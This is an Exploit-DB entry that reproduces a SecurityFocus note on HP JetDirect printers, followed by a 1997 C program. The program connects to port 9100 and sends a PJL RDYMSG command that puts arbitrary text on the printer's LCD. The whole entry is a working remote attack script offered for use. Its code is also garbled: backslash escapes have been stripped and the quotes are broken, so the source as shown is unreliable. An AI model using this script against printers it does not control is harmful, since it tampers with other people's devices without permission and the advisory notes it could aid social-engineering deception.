https://www.exploit-db.com/exploits/20565

漏洞细节尚未披露

/*
source: http://www.securityfocus.com/bid/2245/info

Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. 
*/

/*
   HP Printer Hack
   12/8/97 [email protected]
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>

#define PORT 9100

int main (int argc, char *argv[]) {

  int sockfd,len,bytes_sent;   /* Sock FD */
  struct hostent *host;   /* info from gethostbyname */
  struct sockaddr_in dest_addr;   /* Host Address */
  char line[100];

  if (argc !=3) {
    printf("HP Display [email protected] 12/8/97nn%s printer "message"n",argv[0]);
    printf("tMessage can be up to 16 characters longn");
    exit(1);
  }

  if ( (host=gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(1);
  }

  printf ("HP Display hack -- [email protected]");
  printf ("Hostname:   %sn", argv[1]);
  printf ("Message: %sn",argv[2]);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(PORT) ; /* PORT defined above */

  /* Prepare dest_addr */
  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

  bzero(&(dest_addr.sin_zero), 8);  /* Take care of  sin_zero  ??? */


  /* Get socket */
/*  printf ("Grabbing socket....n"); */
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
  }

  /* Connect !*/

  printf ("Connecting....n");

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);}

  /* Preparing JPL Command */

  strcpy(line,"33%-12345X@PJL RDYMSG DISPLAY = "");
  strncat(line,argv[2],16);
  strcat(line,""rn33%-12345Xrn");

  /* Sending data! */

/*  printf ("Sending Data...%dn",strlen(line));*/
/*  printf ("Line: %sn",line); */
  bytes_sent=send(sockfd,line,strlen(line),0);

  printf("Sent %d bytesn",bytes_sent);
  close(sockfd);
}